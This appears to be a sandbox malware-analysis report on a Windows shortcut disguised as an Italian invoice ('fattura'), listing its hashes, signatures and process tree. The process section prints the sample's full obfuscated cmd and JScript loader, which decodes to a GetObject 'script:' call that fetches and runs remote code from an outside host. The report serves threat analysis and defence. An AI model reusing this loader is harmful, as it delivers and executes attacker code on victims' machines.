Analysis
-
max time kernel
117s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
-
submitted
05/01/2024, 07:21
General
-
Target
fattura lnk.lnk
-
Size
1KB
-
MD5
d6f04ca2263b55ef95ae2ad4edbe4805
-
SHA1
b6b3cb3cfe25edb646b03cf0189014123ee86966
-
SHA256
46a5851b66d038d08ad7074ccaf3544bee669d72b4a7222a61210c0358262a1a
-
SHA512
52d2c8aa46fa114809bf8bec11f176ea0dee3a6594fe508353a5d5e56587360fd4c67c719a9acbc4787a06895179a6e52fc6f2854c13cd51d866651d3b519573
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\fattura lnk.lnk"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "S^eT XJB=C:\LAn22L\&& mD !XJB!>nul 2>&1&&S^eT RJKP=!XJB!^DJLVTMIJ.JS&&<nul set/p DPEB=var DPEB='\u0037\u0077\u0068\u002b\u0044\u0037\u0077\u0068\u002b\u0045\u0037\u0077\u0068\u002b\u0022\u002f\u002f\u006a\u0070\u0061\u006a\u0077\u002e\u006a\u006f\u0075\u0072\u006e\u0065\u0079\u0065\u0064\u0067\u0065\u002e\u006d\u0079\u002e\u0069\u0064\u002f\u003f\u0031\u002f\u0022\u0029\u003b';XJB='\u003a\u0068\u0022\u003b\u0045\u0037\u0077\u0068\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';DJLV='\u0076\u0061\u0072\u0020\u0043\u0037\u0077\u0068\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0037\u0077\u0068\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';RJKP=DJLV+XJB+DPEB;TMIJ=new Function(RJKP);TMIJ(); >!RJKP!|caLl !RJKP!||caLl !RJKP! "2⤵
-